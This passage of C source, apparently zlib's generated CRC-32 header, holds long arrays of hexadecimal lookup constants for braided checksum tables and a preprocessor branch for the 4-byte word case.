0xf01864f800000000, 0x00cafa8f00000000, 0x6f865f1400000000, 0x1e19cb6600000000, 0x71556efd00000000, 0x8187f08a00000000, 0xeecb551100000000, 0x6122cd6500000000, 0x0e6e68fe00000000, 0xfebcf68900000000, 0x91f0531200000000, 0x1c82df6c00000000, 0x73ce7af700000000, 0x831ce48000000000, 0xec50411b00000000, 0x63b9d96f00000000, 0x0cf57cf400000000, 0xfc27e28300000000, 0x936b471800000000, 0xe2f4d36a00000000, 0x8db876f100000000, 0x7d6ae88600000000, 0x12264d1d00000000, 0x9dcfd56900000000, 0xf28370f200000000, 0x0251ee8500000000, 0x6d1d4b1e00000000, 0x18b4f67800000000, 0x77f853e300000000, 0x872acd9400000000, 0xe866680f00000000, 0x678ff07b00000000, 0x08c355e000000000, 0xf811cb9700000000, 
0x975d6e0c00000000, 0xe6c2fa7e00000000, 0x898e5fe500000000, 0x795cc19200000000, 0x1610640900000000, 0x99f9fc7d00000000, 0xf6b559e600000000, 0x0667c79100000000, 0x692b620a00000000, 0xe459ee7400000000, 0x8b154bef00000000, 0x7bc7d59800000000, 0x148b700300000000, 0x9b62e87700000000, 0xf42e4dec00000000, 0x04fcd39b00000000, 0x6bb0760000000000, 0x1a2fe27200000000, 0x756347e900000000, 0x85b1d99e00000000, 0xeafd7c0500000000, 0x6514e47100000000, 0x0a5841ea00000000, 0xfa8adf9d00000000, 0x95c67a0600000000, 0x10d8a45000000000, 0x7f9401cb00000000, 0x8f469fbc00000000, 0xe00a3a2700000000, 0x6fe3a25300000000, 0x00af07c800000000, 0xf07d99bf00000000, 0x9f313c2400000000, 0xeeaea85600000000, 0x81e20dcd00000000, 0x713093ba00000000, 0x1e7c362100000000, 0x9195ae5500000000, 0xfed90bce00000000, 0x0e0b95b900000000, 0x6147302200000000, 0xec35bc5c00000000, 0x837919c700000000, 0x73ab87b000000000, 0x1ce7222b00000000, 0x930eba5f00000000, 0xfc421fc400000000, 0x0c9081b300000000, 0x63dc242800000000, 0x1243b05a00000000, 0x7d0f15c100000000, 0x8ddd8bb600000000, 0xe2912e2d00000000, 0x6d78b65900000000, 0x023413c200000000, 0xf2e68db500000000, 0x9daa282e00000000, 0xe803954800000000, 0x874f30d300000000, 0x779daea400000000, 0x18d10b3f00000000, 0x9738934b00000000, 0xf87436d000000000, 0x08a6a8a700000000, 0x67ea0d3c00000000, 0x1675994e00000000, 0x79393cd500000000, 0x89eba2a200000000, 0xe6a7073900000000, 0x694e9f4d00000000, 0x06023ad600000000, 0xf6d0a4a100000000, 0x999c013a00000000, 0x14ee8d4400000000, 0x7ba228df00000000, 0x8b70b6a800000000, 0xe43c133300000000, 0x6bd58b4700000000, 0x04992edc00000000, 0xf44bb0ab00000000, 0x9b07153000000000, 0xea98814200000000, 0x85d424d900000000, 0x7506baae00000000, 0x1a4a1f3500000000, 0x95a3874100000000, 0xfaef22da00000000, 0x0a3dbcad00000000, 0x6571193600000000}, {0x0000000000000000, 0x85d996dd00000000, 0x4bb55c6000000000, 0xce6ccabd00000000, 0x966ab9c000000000, 0x13b32f1d00000000, 0xdddfe5a000000000, 0x5806737d00000000, 0x6dd3035a00000000, 0xe80a958700000000, 
0x26665f3a00000000, 0xa3bfc9e700000000, 0xfbb9ba9a00000000, 0x7e602c4700000000, 0xb00ce6fa00000000, 0x35d5702700000000, 0xdaa607b400000000, 0x5f7f916900000000, 0x91135bd400000000, 0x14cacd0900000000, 0x4cccbe7400000000, 0xc91528a900000000, 0x0779e21400000000, 0x82a074c900000000, 0xb77504ee00000000, 0x32ac923300000000, 0xfcc0588e00000000, 0x7919ce5300000000, 0x211fbd2e00000000, 0xa4c62bf300000000, 0x6aaae14e00000000, 0xef73779300000000, 0xf54b7eb300000000, 0x7092e86e00000000, 0xbefe22d300000000, 0x3b27b40e00000000, 0x6321c77300000000, 0xe6f851ae00000000, 0x28949b1300000000, 0xad4d0dce00000000, 0x98987de900000000, 0x1d41eb3400000000, 0xd32d218900000000, 0x56f4b75400000000, 0x0ef2c42900000000, 0x8b2b52f400000000, 0x4547984900000000, 0xc09e0e9400000000, 0x2fed790700000000, 0xaa34efda00000000, 0x6458256700000000, 0xe181b3ba00000000, 0xb987c0c700000000, 0x3c5e561a00000000, 0xf2329ca700000000, 0x77eb0a7a00000000, 0x423e7a5d00000000, 0xc7e7ec8000000000, 0x098b263d00000000, 0x8c52b0e000000000, 0xd454c39d00000000, 0x518d554000000000, 0x9fe19ffd00000000, 0x1a38092000000000, 0xab918dbd00000000, 0x2e481b6000000000, 0xe024d1dd00000000, 0x65fd470000000000, 0x3dfb347d00000000, 0xb822a2a000000000, 0x764e681d00000000, 0xf397fec000000000, 0xc6428ee700000000, 0x439b183a00000000, 0x8df7d28700000000, 0x082e445a00000000, 0x5028372700000000, 0xd5f1a1fa00000000, 0x1b9d6b4700000000, 0x9e44fd9a00000000, 0x71378a0900000000, 0xf4ee1cd400000000, 0x3a82d66900000000, 0xbf5b40b400000000, 0xe75d33c900000000, 0x6284a51400000000, 0xace86fa900000000, 0x2931f97400000000, 0x1ce4895300000000, 0x993d1f8e00000000, 0x5751d53300000000, 0xd28843ee00000000, 0x8a8e309300000000, 0x0f57a64e00000000, 0xc13b6cf300000000, 0x44e2fa2e00000000, 0x5edaf30e00000000, 0xdb0365d300000000, 0x156faf6e00000000, 0x90b639b300000000, 0xc8b04ace00000000, 0x4d69dc1300000000, 0x830516ae00000000, 0x06dc807300000000, 0x3309f05400000000, 0xb6d0668900000000, 0x78bcac3400000000, 0xfd653ae900000000, 0xa563499400000000, 0x20badf4900000000, 
0xeed615f400000000, 0x6b0f832900000000, 0x847cf4ba00000000, 0x01a5626700000000, 0xcfc9a8da00000000, 0x4a103e0700000000, 0x12164d7a00000000, 0x97cfdba700000000, 0x59a3111a00000000, 0xdc7a87c700000000, 0xe9aff7e000000000, 0x6c76613d00000000, 0xa21aab8000000000, 0x27c33d5d00000000, 0x7fc54e2000000000, 0xfa1cd8fd00000000, 0x3470124000000000, 0xb1a9849d00000000, 0x17256aa000000000, 0x92fcfc7d00000000, 0x5c9036c000000000, 0xd949a01d00000000, 0x814fd36000000000, 0x049645bd00000000, 0xcafa8f0000000000, 0x4f2319dd00000000, 0x7af669fa00000000, 0xff2fff2700000000, 0x3143359a00000000, 0xb49aa34700000000, 0xec9cd03a00000000, 0x694546e700000000, 0xa7298c5a00000000, 0x22f01a8700000000, 0xcd836d1400000000, 0x485afbc900000000, 0x8636317400000000, 0x03efa7a900000000, 0x5be9d4d400000000, 0xde30420900000000, 0x105c88b400000000, 0x95851e6900000000, 0xa0506e4e00000000, 0x2589f89300000000, 0xebe5322e00000000, 0x6e3ca4f300000000, 0x363ad78e00000000, 0xb3e3415300000000, 0x7d8f8bee00000000, 0xf8561d3300000000, 0xe26e141300000000, 0x67b782ce00000000, 0xa9db487300000000, 0x2c02deae00000000, 0x7404add300000000, 0xf1dd3b0e00000000, 0x3fb1f1b300000000, 0xba68676e00000000, 0x8fbd174900000000, 0x0a64819400000000, 0xc4084b2900000000, 0x41d1ddf400000000, 0x19d7ae8900000000, 0x9c0e385400000000, 0x5262f2e900000000, 0xd7bb643400000000, 0x38c813a700000000, 0xbd11857a00000000, 0x737d4fc700000000, 0xf6a4d91a00000000, 0xaea2aa6700000000, 0x2b7b3cba00000000, 0xe517f60700000000, 0x60ce60da00000000, 0x551b10fd00000000, 0xd0c2862000000000, 0x1eae4c9d00000000, 0x9b77da4000000000, 0xc371a93d00000000, 0x46a83fe000000000, 0x88c4f55d00000000, 0x0d1d638000000000, 0xbcb4e71d00000000, 0x396d71c000000000, 0xf701bb7d00000000, 0x72d82da000000000, 0x2ade5edd00000000, 0xaf07c80000000000, 0x616b02bd00000000, 0xe4b2946000000000, 0xd167e44700000000, 0x54be729a00000000, 0x9ad2b82700000000, 0x1f0b2efa00000000, 0x470d5d8700000000, 0xc2d4cb5a00000000, 0x0cb801e700000000, 0x8961973a00000000, 0x6612e0a900000000, 0xe3cb767400000000, 
0x2da7bcc900000000, 0xa87e2a1400000000, 0xf078596900000000, 0x75a1cfb400000000, 0xbbcd050900000000, 0x3e1493d400000000, 0x0bc1e3f300000000, 0x8e18752e00000000, 0x4074bf9300000000, 0xc5ad294e00000000, 0x9dab5a3300000000, 0x1872ccee00000000, 0xd61e065300000000, 0x53c7908e00000000, 0x49ff99ae00000000, 0xcc260f7300000000, 0x024ac5ce00000000, 0x8793531300000000, 0xdf95206e00000000, 0x5a4cb6b300000000, 0x94207c0e00000000, 0x11f9ead300000000, 0x242c9af400000000, 0xa1f50c2900000000, 0x6f99c69400000000, 0xea40504900000000, 0xb246233400000000, 0x379fb5e900000000, 0xf9f37f5400000000, 0x7c2ae98900000000, 0x93599e1a00000000, 0x168008c700000000, 0xd8ecc27a00000000, 0x5d3554a700000000, 0x053327da00000000, 0x80eab10700000000, 0x4e867bba00000000, 0xcb5fed6700000000, 0xfe8a9d4000000000, 0x7b530b9d00000000, 0xb53fc12000000000, 0x30e657fd00000000, 0x68e0248000000000, 0xed39b25d00000000, 0x235578e000000000, 0xa68cee3d00000000}, {0x0000000000000000, 0x76e10f9d00000000, 0xadc46ee100000000, 0xdb25617c00000000, 0x1b8fac1900000000, 0x6d6ea38400000000, 0xb64bc2f800000000, 0xc0aacd6500000000, 0x361e593300000000, 0x40ff56ae00000000, 0x9bda37d200000000, 0xed3b384f00000000, 0x2d91f52a00000000, 0x5b70fab700000000, 0x80559bcb00000000, 0xf6b4945600000000, 0x6c3cb26600000000, 0x1addbdfb00000000, 0xc1f8dc8700000000, 0xb719d31a00000000, 0x77b31e7f00000000, 0x015211e200000000, 0xda77709e00000000, 0xac967f0300000000, 0x5a22eb5500000000, 0x2cc3e4c800000000, 0xf7e685b400000000, 0x81078a2900000000, 0x41ad474c00000000, 0x374c48d100000000, 0xec6929ad00000000, 0x9a88263000000000, 0xd87864cd00000000, 0xae996b5000000000, 0x75bc0a2c00000000, 0x035d05b100000000, 0xc3f7c8d400000000, 0xb516c74900000000, 0x6e33a63500000000, 0x18d2a9a800000000, 0xee663dfe00000000, 0x9887326300000000, 0x43a2531f00000000, 0x35435c8200000000, 0xf5e991e700000000, 0x83089e7a00000000, 0x582dff0600000000, 0x2eccf09b00000000, 0xb444d6ab00000000, 0xc2a5d93600000000, 0x1980b84a00000000, 0x6f61b7d700000000, 0xafcb7ab200000000, 
0xd92a752f00000000, 0x020f145300000000, 0x74ee1bce00000000, 0x825a8f9800000000, 0xf4bb800500000000, 0x2f9ee17900000000, 0x597feee400000000, 0x99d5238100000000, 0xef342c1c00000000, 0x34114d6000000000, 0x42f042fd00000000, 0xf1f7b94100000000, 0x8716b6dc00000000, 0x5c33d7a000000000, 0x2ad2d83d00000000, 0xea78155800000000, 0x9c991ac500000000, 0x47bc7bb900000000, 0x315d742400000000, 0xc7e9e07200000000, 0xb108efef00000000, 0x6a2d8e9300000000, 0x1ccc810e00000000, 0xdc664c6b00000000, 0xaa8743f600000000, 0x71a2228a00000000, 0x07432d1700000000, 0x9dcb0b2700000000, 0xeb2a04ba00000000, 0x300f65c600000000, 0x46ee6a5b00000000, 0x8644a73e00000000, 0xf0a5a8a300000000, 0x2b80c9df00000000, 0x5d61c64200000000, 0xabd5521400000000, 0xdd345d8900000000, 0x06113cf500000000, 0x70f0336800000000, 0xb05afe0d00000000, 0xc6bbf19000000000, 0x1d9e90ec00000000, 0x6b7f9f7100000000, 0x298fdd8c00000000, 0x5f6ed21100000000, 0x844bb36d00000000, 0xf2aabcf000000000, 0x3200719500000000, 0x44e17e0800000000, 0x9fc41f7400000000, 0xe92510e900000000, 0x1f9184bf00000000, 0x69708b2200000000, 0xb255ea5e00000000, 0xc4b4e5c300000000, 0x041e28a600000000, 0x72ff273b00000000, 0xa9da464700000000, 0xdf3b49da00000000, 0x45b36fea00000000, 0x3352607700000000, 0xe877010b00000000, 0x9e960e9600000000, 0x5e3cc3f300000000, 0x28ddcc6e00000000, 0xf3f8ad1200000000, 0x8519a28f00000000, 0x73ad36d900000000, 0x054c394400000000, 0xde69583800000000, 0xa88857a500000000, 0x68229ac000000000, 0x1ec3955d00000000, 0xc5e6f42100000000, 0xb307fbbc00000000, 0xe2ef738300000000, 0x940e7c1e00000000, 0x4f2b1d6200000000, 0x39ca12ff00000000, 0xf960df9a00000000, 0x8f81d00700000000, 0x54a4b17b00000000, 0x2245bee600000000, 0xd4f12ab000000000, 0xa210252d00000000, 0x7935445100000000, 0x0fd44bcc00000000, 0xcf7e86a900000000, 0xb99f893400000000, 0x62bae84800000000, 0x145be7d500000000, 0x8ed3c1e500000000, 0xf832ce7800000000, 0x2317af0400000000, 0x55f6a09900000000, 0x955c6dfc00000000, 0xe3bd626100000000, 0x3898031d00000000, 0x4e790c8000000000, 0xb8cd98d600000000, 
0xce2c974b00000000, 0x1509f63700000000, 0x63e8f9aa00000000, 0xa34234cf00000000, 0xd5a33b5200000000, 0x0e865a2e00000000, 0x786755b300000000, 0x3a97174e00000000, 0x4c7618d300000000, 0x975379af00000000, 0xe1b2763200000000, 0x2118bb5700000000, 0x57f9b4ca00000000, 0x8cdcd5b600000000, 0xfa3dda2b00000000, 0x0c894e7d00000000, 0x7a6841e000000000, 0xa14d209c00000000, 0xd7ac2f0100000000, 0x1706e26400000000, 0x61e7edf900000000, 0xbac28c8500000000, 0xcc23831800000000, 0x56aba52800000000, 0x204aaab500000000, 0xfb6fcbc900000000, 0x8d8ec45400000000, 0x4d24093100000000, 0x3bc506ac00000000, 0xe0e067d000000000, 0x9601684d00000000, 0x60b5fc1b00000000, 0x1654f38600000000, 0xcd7192fa00000000, 0xbb909d6700000000, 0x7b3a500200000000, 0x0ddb5f9f00000000, 0xd6fe3ee300000000, 0xa01f317e00000000, 0x1318cac200000000, 0x65f9c55f00000000, 0xbedca42300000000, 0xc83dabbe00000000, 0x089766db00000000, 0x7e76694600000000, 0xa553083a00000000, 0xd3b207a700000000, 0x250693f100000000, 0x53e79c6c00000000, 0x88c2fd1000000000, 0xfe23f28d00000000, 0x3e893fe800000000, 0x4868307500000000, 0x934d510900000000, 0xe5ac5e9400000000, 0x7f2478a400000000, 0x09c5773900000000, 0xd2e0164500000000, 0xa40119d800000000, 0x64abd4bd00000000, 0x124adb2000000000, 0xc96fba5c00000000, 0xbf8eb5c100000000, 0x493a219700000000, 0x3fdb2e0a00000000, 0xe4fe4f7600000000, 0x921f40eb00000000, 0x52b58d8e00000000, 0x2454821300000000, 0xff71e36f00000000, 0x8990ecf200000000, 0xcb60ae0f00000000, 0xbd81a19200000000, 0x66a4c0ee00000000, 0x1045cf7300000000, 0xd0ef021600000000, 0xa60e0d8b00000000, 0x7d2b6cf700000000, 0x0bca636a00000000, 0xfd7ef73c00000000, 0x8b9ff8a100000000, 0x50ba99dd00000000, 0x265b964000000000, 0xe6f15b2500000000, 0x901054b800000000, 0x4b3535c400000000, 0x3dd43a5900000000, 0xa75c1c6900000000, 0xd1bd13f400000000, 0x0a98728800000000, 0x7c797d1500000000, 0xbcd3b07000000000, 0xca32bfed00000000, 0x1117de9100000000, 0x67f6d10c00000000, 0x9142455a00000000, 0xe7a34ac700000000, 0x3c862bbb00000000, 0x4a67242600000000, 0x8acde94300000000, 
0xfc2ce6de00000000, 0x270987a200000000, 0x51e8883f00000000}, {0x0000000000000000, 0xe8dbfbb900000000, 0x91b186a800000000, 0x796a7d1100000000, 0x63657c8a00000000, 0x8bbe873300000000, 0xf2d4fa2200000000, 0x1a0f019b00000000, 0x87cc89cf00000000, 0x6f17727600000000, 0x167d0f6700000000, 0xfea6f4de00000000, 0xe4a9f54500000000, 0x0c720efc00000000, 0x751873ed00000000, 0x9dc3885400000000, 0x4f9f624400000000, 0xa74499fd00000000, 0xde2ee4ec00000000, 0x36f51f5500000000, 0x2cfa1ece00000000, 0xc421e57700000000, 0xbd4b986600000000, 0x559063df00000000, 0xc853eb8b00000000, 0x2088103200000000, 0x59e26d2300000000, 0xb139969a00000000, 0xab36970100000000, 0x43ed6cb800000000, 0x3a8711a900000000, 0xd25cea1000000000, 0x9e3ec58800000000, 0x76e53e3100000000, 0x0f8f432000000000, 0xe754b89900000000, 0xfd5bb90200000000, 0x158042bb00000000, 0x6cea3faa00000000, 0x8431c41300000000, 0x19f24c4700000000, 0xf129b7fe00000000, 0x8843caef00000000, 0x6098315600000000, 0x7a9730cd00000000, 0x924ccb7400000000, 0xeb26b66500000000, 0x03fd4ddc00000000, 0xd1a1a7cc00000000, 0x397a5c7500000000, 0x4010216400000000, 0xa8cbdadd00000000, 0xb2c4db4600000000, 0x5a1f20ff00000000, 0x23755dee00000000, 0xcbaea65700000000, 0x566d2e0300000000, 0xbeb6d5ba00000000, 0xc7dca8ab00000000, 0x2f07531200000000, 0x3508528900000000, 0xddd3a93000000000, 0xa4b9d42100000000, 0x4c622f9800000000, 0x7d7bfbca00000000, 0x95a0007300000000, 0xecca7d6200000000, 0x041186db00000000, 0x1e1e874000000000, 0xf6c57cf900000000, 0x8faf01e800000000, 0x6774fa5100000000, 0xfab7720500000000, 0x126c89bc00000000, 0x6b06f4ad00000000, 0x83dd0f1400000000, 0x99d20e8f00000000, 0x7109f53600000000, 0x0863882700000000, 0xe0b8739e00000000, 0x32e4998e00000000, 0xda3f623700000000, 0xa3551f2600000000, 0x4b8ee49f00000000, 0x5181e50400000000, 0xb95a1ebd00000000, 0xc03063ac00000000, 0x28eb981500000000, 0xb528104100000000, 0x5df3ebf800000000, 0x249996e900000000, 0xcc426d5000000000, 0xd64d6ccb00000000, 0x3e96977200000000, 0x47fcea6300000000, 0xaf2711da00000000, 
0xe3453e4200000000, 0x0b9ec5fb00000000, 0x72f4b8ea00000000, 0x9a2f435300000000, 0x802042c800000000, 0x68fbb97100000000, 0x1191c46000000000, 0xf94a3fd900000000, 0x6489b78d00000000, 0x8c524c3400000000, 0xf538312500000000, 0x1de3ca9c00000000, 0x07eccb0700000000, 0xef3730be00000000, 0x965d4daf00000000, 0x7e86b61600000000, 0xacda5c0600000000, 0x4401a7bf00000000, 0x3d6bdaae00000000, 0xd5b0211700000000, 0xcfbf208c00000000, 0x2764db3500000000, 0x5e0ea62400000000, 0xb6d55d9d00000000, 0x2b16d5c900000000, 0xc3cd2e7000000000, 0xbaa7536100000000, 0x527ca8d800000000, 0x4873a94300000000, 0xa0a852fa00000000, 0xd9c22feb00000000, 0x3119d45200000000, 0xbbf0874e00000000, 0x532b7cf700000000, 0x2a4101e600000000, 0xc29afa5f00000000, 0xd895fbc400000000, 0x304e007d00000000, 0x49247d6c00000000, 0xa1ff86d500000000, 0x3c3c0e8100000000, 0xd4e7f53800000000, 0xad8d882900000000, 0x4556739000000000, 0x5f59720b00000000, 0xb78289b200000000, 0xcee8f4a300000000, 0x26330f1a00000000, 0xf46fe50a00000000, 0x1cb41eb300000000, 0x65de63a200000000, 0x8d05981b00000000, 0x970a998000000000, 0x7fd1623900000000, 0x06bb1f2800000000, 0xee60e49100000000, 0x73a36cc500000000, 0x9b78977c00000000, 0xe212ea6d00000000, 0x0ac911d400000000, 0x10c6104f00000000, 0xf81debf600000000, 0x817796e700000000, 0x69ac6d5e00000000, 0x25ce42c600000000, 0xcd15b97f00000000, 0xb47fc46e00000000, 0x5ca43fd700000000, 0x46ab3e4c00000000, 0xae70c5f500000000, 0xd71ab8e400000000, 0x3fc1435d00000000, 0xa202cb0900000000, 0x4ad930b000000000, 0x33b34da100000000, 0xdb68b61800000000, 0xc167b78300000000, 0x29bc4c3a00000000, 0x50d6312b00000000, 0xb80dca9200000000, 0x6a51208200000000, 0x828adb3b00000000, 0xfbe0a62a00000000, 0x133b5d9300000000, 0x09345c0800000000, 0xe1efa7b100000000, 0x9885daa000000000, 0x705e211900000000, 0xed9da94d00000000, 0x054652f400000000, 0x7c2c2fe500000000, 0x94f7d45c00000000, 0x8ef8d5c700000000, 0x66232e7e00000000, 0x1f49536f00000000, 0xf792a8d600000000, 0xc68b7c8400000000, 0x2e50873d00000000, 0x573afa2c00000000, 0xbfe1019500000000, 
0xa5ee000e00000000, 0x4d35fbb700000000, 0x345f86a600000000, 0xdc847d1f00000000, 0x4147f54b00000000, 0xa99c0ef200000000, 0xd0f673e300000000, 0x382d885a00000000, 0x222289c100000000, 0xcaf9727800000000, 0xb3930f6900000000, 0x5b48f4d000000000, 0x89141ec000000000, 0x61cfe57900000000, 0x18a5986800000000, 0xf07e63d100000000, 0xea71624a00000000, 0x02aa99f300000000, 0x7bc0e4e200000000, 0x931b1f5b00000000, 0x0ed8970f00000000, 0xe6036cb600000000, 0x9f6911a700000000, 0x77b2ea1e00000000, 0x6dbdeb8500000000, 0x8566103c00000000, 0xfc0c6d2d00000000, 0x14d7969400000000, 0x58b5b90c00000000, 0xb06e42b500000000, 0xc9043fa400000000, 0x21dfc41d00000000, 0x3bd0c58600000000, 0xd30b3e3f00000000, 0xaa61432e00000000, 0x42bab89700000000, 0xdf7930c300000000, 0x37a2cb7a00000000, 0x4ec8b66b00000000, 0xa6134dd200000000, 0xbc1c4c4900000000, 0x54c7b7f000000000, 0x2dadcae100000000, 0xc576315800000000, 0x172adb4800000000, 0xfff120f100000000, 0x869b5de000000000, 0x6e40a65900000000, 0x744fa7c200000000, 0x9c945c7b00000000, 0xe5fe216a00000000, 0x0d25dad300000000, 0x90e6528700000000, 0x783da93e00000000, 0x0157d42f00000000, 0xe98c2f9600000000, 0xf3832e0d00000000, 0x1b58d5b400000000, 0x6232a8a500000000, 0x8ae9531c00000000}, {0x0000000000000000, 0x919168ae00000000, 0x6325a08700000000, 0xf2b4c82900000000, 0x874c31d400000000, 0x16dd597a00000000, 0xe469915300000000, 0x75f8f9fd00000000, 0x4f9f137300000000, 0xde0e7bdd00000000, 0x2cbab3f400000000, 0xbd2bdb5a00000000, 0xc8d322a700000000, 0x59424a0900000000, 0xabf6822000000000, 0x3a67ea8e00000000, 0x9e3e27e600000000, 0x0faf4f4800000000, 0xfd1b876100000000, 0x6c8aefcf00000000, 0x1972163200000000, 0x88e37e9c00000000, 0x7a57b6b500000000, 0xebc6de1b00000000, 0xd1a1349500000000, 0x40305c3b00000000, 0xb284941200000000, 0x2315fcbc00000000, 0x56ed054100000000, 0xc77c6def00000000, 0x35c8a5c600000000, 0xa459cd6800000000, 0x7d7b3f1700000000, 0xecea57b900000000, 0x1e5e9f9000000000, 0x8fcff73e00000000, 0xfa370ec300000000, 0x6ba6666d00000000, 0x9912ae4400000000, 
0x0883c6ea00000000, 0x32e42c6400000000, 0xa37544ca00000000, 0x51c18ce300000000, 0xc050e44d00000000, 0xb5a81db000000000, 0x2439751e00000000, 0xd68dbd3700000000, 0x471cd59900000000, 0xe34518f100000000, 0x72d4705f00000000, 0x8060b87600000000, 0x11f1d0d800000000, 0x6409292500000000, 0xf598418b00000000, 0x072c89a200000000, 0x96bde10c00000000, 0xacda0b8200000000, 0x3d4b632c00000000, 0xcfffab0500000000, 0x5e6ec3ab00000000, 0x2b963a5600000000, 0xba0752f800000000, 0x48b39ad100000000, 0xd922f27f00000000, 0xfaf67e2e00000000, 0x6b67168000000000, 0x99d3dea900000000, 0x0842b60700000000, 0x7dba4ffa00000000, 0xec2b275400000000, 0x1e9fef7d00000000, 0x8f0e87d300000000, 0xb5696d5d00000000, 0x24f805f300000000, 0xd64ccdda00000000, 0x47dda57400000000, 0x32255c8900000000, 0xa3b4342700000000, 0x5100fc0e00000000, 0xc09194a000000000, 0x64c859c800000000, 0xf559316600000000, 0x07edf94f00000000, 0x967c91e100000000, 0xe384681c00000000, 0x721500b200000000, 0x80a1c89b00000000, 0x1130a03500000000, 0x2b574abb00000000, 0xbac6221500000000, 0x4872ea3c00000000, 0xd9e3829200000000, 0xac1b7b6f00000000, 0x3d8a13c100000000, 0xcf3edbe800000000, 0x5eafb34600000000, 0x878d413900000000, 0x161c299700000000, 0xe4a8e1be00000000, 0x7539891000000000, 0x00c170ed00000000, 0x9150184300000000, 0x63e4d06a00000000, 0xf275b8c400000000, 0xc812524a00000000, 0x59833ae400000000, 0xab37f2cd00000000, 0x3aa69a6300000000, 0x4f5e639e00000000, 0xdecf0b3000000000, 0x2c7bc31900000000, 0xbdeaabb700000000, 0x19b366df00000000, 0x88220e7100000000, 0x7a96c65800000000, 0xeb07aef600000000, 0x9eff570b00000000, 0x0f6e3fa500000000, 0xfddaf78c00000000, 0x6c4b9f2200000000, 0x562c75ac00000000, 0xc7bd1d0200000000, 0x3509d52b00000000, 0xa498bd8500000000, 0xd160447800000000, 0x40f12cd600000000, 0xb245e4ff00000000, 0x23d48c5100000000, 0xf4edfd5c00000000, 0x657c95f200000000, 0x97c85ddb00000000, 0x0659357500000000, 0x73a1cc8800000000, 0xe230a42600000000, 0x10846c0f00000000, 0x811504a100000000, 0xbb72ee2f00000000, 0x2ae3868100000000, 0xd8574ea800000000, 
0x49c6260600000000, 0x3c3edffb00000000, 0xadafb75500000000, 0x5f1b7f7c00000000, 0xce8a17d200000000, 0x6ad3daba00000000, 0xfb42b21400000000, 0x09f67a3d00000000, 0x9867129300000000, 0xed9feb6e00000000, 0x7c0e83c000000000, 0x8eba4be900000000, 0x1f2b234700000000, 0x254cc9c900000000, 0xb4dda16700000000, 0x4669694e00000000, 0xd7f801e000000000, 0xa200f81d00000000, 0x339190b300000000, 0xc125589a00000000, 0x50b4303400000000, 0x8996c24b00000000, 0x1807aae500000000, 0xeab362cc00000000, 0x7b220a6200000000, 0x0edaf39f00000000, 0x9f4b9b3100000000, 0x6dff531800000000, 0xfc6e3bb600000000, 0xc609d13800000000, 0x5798b99600000000, 0xa52c71bf00000000, 0x34bd191100000000, 0x4145e0ec00000000, 0xd0d4884200000000, 0x2260406b00000000, 0xb3f128c500000000, 0x17a8e5ad00000000, 0x86398d0300000000, 0x748d452a00000000, 0xe51c2d8400000000, 0x90e4d47900000000, 0x0175bcd700000000, 0xf3c174fe00000000, 0x62501c5000000000, 0x5837f6de00000000, 0xc9a69e7000000000, 0x3b12565900000000, 0xaa833ef700000000, 0xdf7bc70a00000000, 0x4eeaafa400000000, 0xbc5e678d00000000, 0x2dcf0f2300000000, 0x0e1b837200000000, 0x9f8aebdc00000000, 0x6d3e23f500000000, 0xfcaf4b5b00000000, 0x8957b2a600000000, 0x18c6da0800000000, 0xea72122100000000, 0x7be37a8f00000000, 0x4184900100000000, 0xd015f8af00000000, 0x22a1308600000000, 0xb330582800000000, 0xc6c8a1d500000000, 0x5759c97b00000000, 0xa5ed015200000000, 0x347c69fc00000000, 0x9025a49400000000, 0x01b4cc3a00000000, 0xf300041300000000, 0x62916cbd00000000, 0x1769954000000000, 0x86f8fdee00000000, 0x744c35c700000000, 0xe5dd5d6900000000, 0xdfbab7e700000000, 0x4e2bdf4900000000, 0xbc9f176000000000, 0x2d0e7fce00000000, 0x58f6863300000000, 0xc967ee9d00000000, 0x3bd326b400000000, 0xaa424e1a00000000, 0x7360bc6500000000, 0xe2f1d4cb00000000, 0x10451ce200000000, 0x81d4744c00000000, 0xf42c8db100000000, 0x65bde51f00000000, 0x97092d3600000000, 0x0698459800000000, 0x3cffaf1600000000, 0xad6ec7b800000000, 0x5fda0f9100000000, 0xce4b673f00000000, 0xbbb39ec200000000, 0x2a22f66c00000000, 0xd8963e4500000000, 
0x490756eb00000000, 0xed5e9b8300000000, 0x7ccff32d00000000, 0x8e7b3b0400000000, 0x1fea53aa00000000, 0x6a12aa5700000000, 0xfb83c2f900000000, 0x09370ad000000000, 0x98a6627e00000000, 0xa2c188f000000000, 0x3350e05e00000000, 0xc1e4287700000000, 0x507540d900000000, 0x258db92400000000, 0xb41cd18a00000000, 0x46a819a300000000, 0xd739710d00000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xccaa009e, 0x4225077d, 0x8e8f07e3, 0x844a0efa, 0x48e00e64, 0xc66f0987, 0x0ac50919, 0xd3e51bb5, 0x1f4f1b2b, 0x91c01cc8, 0x5d6a1c56, 0x57af154f, 0x9b0515d1, 0x158a1232, 0xd92012ac, 0x7cbb312b, 0xb01131b5, 0x3e9e3656, 0xf23436c8, 0xf8f13fd1, 0x345b3f4f, 0xbad438ac, 0x767e3832, 0xaf5e2a9e, 0x63f42a00, 0xed7b2de3, 0x21d12d7d, 0x2b142464, 0xe7be24fa, 0x69312319, 0xa59b2387, 0xf9766256, 0x35dc62c8, 0xbb53652b, 0x77f965b5, 0x7d3c6cac, 0xb1966c32, 0x3f196bd1, 0xf3b36b4f, 0x2a9379e3, 0xe639797d, 0x68b67e9e, 0xa41c7e00, 0xaed97719, 0x62737787, 0xecfc7064, 0x205670fa, 0x85cd537d, 0x496753e3, 0xc7e85400, 0x0b42549e, 0x01875d87, 0xcd2d5d19, 0x43a25afa, 0x8f085a64, 0x562848c8, 0x9a824856, 0x140d4fb5, 0xd8a74f2b, 0xd2624632, 0x1ec846ac, 0x9047414f, 0x5ced41d1, 0x299dc2ed, 0xe537c273, 0x6bb8c590, 0xa712c50e, 0xadd7cc17, 0x617dcc89, 0xeff2cb6a, 0x2358cbf4, 0xfa78d958, 0x36d2d9c6, 0xb85dde25, 0x74f7debb, 0x7e32d7a2, 0xb298d73c, 0x3c17d0df, 0xf0bdd041, 0x5526f3c6, 0x998cf358, 0x1703f4bb, 0xdba9f425, 0xd16cfd3c, 0x1dc6fda2, 0x9349fa41, 0x5fe3fadf, 0x86c3e873, 0x4a69e8ed, 0xc4e6ef0e, 0x084cef90, 0x0289e689, 0xce23e617, 0x40ace1f4, 0x8c06e16a, 0xd0eba0bb, 0x1c41a025, 0x92cea7c6, 0x5e64a758, 0x54a1ae41, 0x980baedf, 0x1684a93c, 0xda2ea9a2, 0x030ebb0e, 0xcfa4bb90, 0x412bbc73, 0x8d81bced, 